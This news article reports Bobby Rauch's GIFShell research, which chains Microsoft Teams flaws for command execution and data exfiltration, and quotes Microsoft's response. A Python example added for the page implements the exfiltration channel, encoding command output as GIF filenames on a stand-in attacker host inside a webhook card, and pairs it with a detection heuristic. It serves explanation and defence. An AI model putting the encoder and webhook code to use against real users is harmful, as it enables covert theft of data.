Microsoft Teams users can share GIF files to more accurately convey their emotions to colleagues, but experts have warned that cybercriminals could also use them to execute malicious commands and steal sensitive data without being detected by antivirus tools.
Cybersecurity consultant and penetration tester Bobby Rauch discovered a number of flaws in the video conferencing platform that, when chained together, could lead to data exfiltration and malicious code execution.
It is also quite an undertaking, as the attacker first has to get the victim to download and install a malicious stager capable of executing commands and uploading their output via GIF URLs to Microsoft Teams webhooks. The stager scans the Microsoft Teams log files, which reportedly store all received messages and are readable by all Windows user groups, regardless of their privilege level.
Using the stager
After setting up the stager, the attacker must create a new Teams tenant and contact Teams users outside their own organization. According to the researcher, this is not much of a challenge, since Microsoft allows external communication by default. Then, using the researcher's Python script, called GIFShell, the attacker can send a malicious .GIF file carrying commands to be executed on the target endpoint.
Both the message and the .GIF file end up in the log folder being watched by the stager. The stager extracts the commands from the .GIF and executes them on the device. It then takes the command output, base64-encodes it, and uses the encoded text as the filename of an external .GIF embedded in a Microsoft Teams survey card. The stager submits that card to the attacker's public Microsoft Teams webhook, and Microsoft's servers then connect to the attacker's server URL to retrieve the .GIF. GIFShell receives that request and decodes the filename, giving the threat actor a clear view of the output of the command executed on the target endpoint.
The researcher also noted that nothing prevents attackers from sending as many GIFs as they want, each carrying different malicious commands. In addition, because the traffic appears to come from Microsoft's own servers, it is treated as legitimate and is not flagged by security tools.
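To make the exfiltration channel described above concrete, here is an added Python example (written for this page, not Rauch's GIFShell code) that shows both sides of the base64-in-filename trick: the stager side that turns command output into GIF URLs and wraps one in a webhook card, the attacker-server side that recovers the output from the requested path, and a defender-side heuristic that flags such URLs in outbound request logs. The host name, the chunk size and the simplified card structure are assumptions for illustration, not Microsoft's schema; the chunking into several GIFs generalizes the single-GIF case in the text, since a URL path can only carry so many characters.

```python
import base64
import json
import re
from urllib.parse import urlparse

# Hypothetical attacker-controlled server that will "host" the .gif files.
ATTACKER_HOST = "https://gifs.example.invalid"

# Constructed sample: what a stager might capture from a process listing.
SAMPLE_OUTPUT = ("USER  PID  %CPU COMMAND\n" + "alice 4242 0.0 teams.exe\n" * 8).encode()


def encode_output_as_gif_urls(output: bytes, chunk_size: int = 1500) -> list:
    """Stager side: split the output into chunks (assumed size), base64url-encode
    each chunk and use it as the file name of an external .gif. One URL per chunk,
    so long output simply becomes several GIFs."""
    urls = []
    for i in range(0, len(output), chunk_size):
        chunk = output[i:i + chunk_size]
        name = base64.urlsafe_b64encode(chunk).decode("ascii").rstrip("=")
        urls.append(f"{ATTACKER_HOST}/{name}.gif")
    return urls


def build_webhook_payload(gif_url: str) -> str:
    """Simplified card body for a Teams incoming webhook (structure is an
    assumption). The image URL is the part Microsoft's servers will fetch,
    which is what carries the data out."""
    card = {
        "@type": "MessageCard",
        "text": "Quick survey",
        "sections": [{"images": [{"image": gif_url}]}],
    }
    return json.dumps(card)


def decode_gif_filename(request_path: str) -> bytes:
    """Attacker-server side: recover the chunk from the path of the GIF request,
    restoring the base64 padding that was stripped for the file name."""
    name = request_path.rsplit("/", 1)[-1]
    if name.lower().endswith(".gif"):
        name = name[:-4]
    name += "=" * (-len(name) % 4)
    return base64.urlsafe_b64decode(name)


# A base64url token of at least 40 characters; ordinary GIF names are shorter.
B64_NAME = re.compile(r"^[A-Za-z0-9_-]{40,}$")


def looks_like_exfil_gif(url: str) -> bool:
    """Defender heuristic for outbound request logs: a .gif whose file name is a
    long base64url token that decodes to mostly printable text. CDN-style hashed
    names are also long, but decode to binary noise, so they are not flagged."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    if not name.lower().endswith(".gif"):
        return False
    if not B64_NAME.match(name[:-4]):
        return False
    try:
        data = decode_gif_filename(name)
    except Exception:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / max(len(data), 1) > 0.9


if __name__ == "__main__":
    for url in encode_output_as_gif_urls(SAMPLE_OUTPUT):
        print(build_webhook_payload(url))
        print("flagged:", looks_like_exfil_gif(url))
```

The heuristic is deliberately narrow: it only catches output that is readable text, so an attacker who compresses or encrypts the chunk before encoding it defeats the printable-ratio check. What remains observable in that case is the shape of the traffic, an unusual number of image fetches with long, high-entropy file names requested through Microsoft's infrastructure, which is where a detection should ultimately be anchored.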
When notified of the findings, Microsoft said it would not address them, as in its view they do not cross a security boundary.
"For this case 72412, although this is great research and the engineering team will try to improve these areas over time, these are all post-exploitation and rely on a target that has already been compromised," Microsoft reportedly told Rauch.
“There does not appear to be a security boundary being crossed. The product team will review the issue for possible future design changes, but the security team will not monitor this.”
Via: BleepingComputer